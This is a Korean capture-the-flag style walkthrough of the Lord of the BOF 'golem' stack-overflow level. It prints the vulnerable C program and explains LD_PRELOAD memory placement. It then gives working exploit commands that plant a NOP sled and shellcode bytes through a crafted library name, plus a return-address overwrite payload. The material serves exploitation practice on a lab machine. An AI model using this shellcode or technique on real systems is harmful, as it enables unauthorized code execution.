[LOB] skeleton -> golem

/*
        The Lord of the BOF : The Fellowship of the BOF
        - golem
        - stack destroyer
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
    char buffer[40];
    int i;
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // stack destroyer!
        memset(buffer, 0, 44);
    memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
}
 

스택 디스트로이어!!!! 가 추가되었다. 이름 그대로 스택은 그냥 파괴해버린다. 

gdb로 돌려봣는데;;; 진짜 깔끔하게 파괴해서 버퍼위로는 그닥 쓸만한 공간이 없다.

여기서 쓸수있는 공간이 있는데 LD_PRELOAD 환경변수를 통해 이를 해결할 수 있다.

LD_PRELOAD는 prefix로 LD_가 붙은, ld.so에 속하는 환경변수로, windows의 AppInit_Dlls 레지스트리와 비슷한 역할을 한다. LD_PRELOAD에 설정된 shared object는 libc를 비롯한 다른 shared object보다 먼저 로딩된다. LD_PRELOAD에 설정된 shared library의 함수 중에 이후 로딩된 libc의 함수 이름과 동일한 함수가 있다면 먼저 로딩된(=LD_PRELOAD에 설정된) shared library의 함수를 호출하게 된다. 그래서 결과적으로 보면 자동으로 후킹을 수행하는 것과 같다.

음.. 위가 좀 어렵게 설명된거같아서 아래 설명된게 좀 더 낫다.

* LD_PRELOAD

프로세스를 실행하는 중에 라이브러리를 로딩할 때, LD_PRELOAD 환경변수가 설정되어 있으면 해당 변수에 지정된 라이브러리를 먼저 로딩하고, 이중 libc 함수명과 동일한 함수가 있다면 해당 함수를 먼저 호출해 준다. 이러한 특성을 이용하여 후킹 가능도 할 수 있다.

LD_PRELOAD의 메모리 영역은 공유 라이브러리 영역인 Stack의 지역 변수(Buffer) 영역 위에 존재합니다. (더 낮은 주소)

-------------------------------------------------------------------------------------------------

| Code | Data | BSS | Heap | 공유 라이브러리 | buffer | STP | RET | argc, argv | env, etc |

-------------------------------------------------------------------------------------------------

이런식이다.

공유라이브러리 영역에 LD_PRELOAD 환경변수를 이용해서 라이브러리를 올리는게 가능하다. (즉 라이브러리명을 올리는게 가능)

1. 일단 공유라이브러리영역에 올릴 임시라이브러리 생성

tmp.c로 만들고 안의 내용은 무엇이든 상관없다. 단 컴파일 옵션을 아래와 같이 해야한다.

 

-fPIC 옵션 : Position-Independent Code의 약자, test.o 파일을 동적라이브러리로 사용하도록 컴파일하는 옵션

-shared 옵션 :  공유라이브러리를 만드는 옵션

gcc -fPIC -shared tmp.c -o `python -c 'print("\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6")'`

2. 환경변수 LD_PRELOAD를 등록한다. 

등록되는 값은 공유라이브러리영역에 올린 라이브러리 경로로, 절대경로로 해야한다.

export LD_PRELOAD="`python -c 'print("/home/skeleton/tmp2/"+"\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6")'`"

3. gdb로 위치 파악

-------------------------------------------------------------------------------------------------

| Code | Data | BSS | Heap | 공유 라이브러리 | buffer | STP | RET | argc, argv | env, etc |

-------------------------------------------------------------------------------------------------

0xbffff55c쯤으로 점프하면 되겠다.

payload : ./golem `python -c 'print("A"*44+"\x5c\xf5\xff\xbf")'`

굿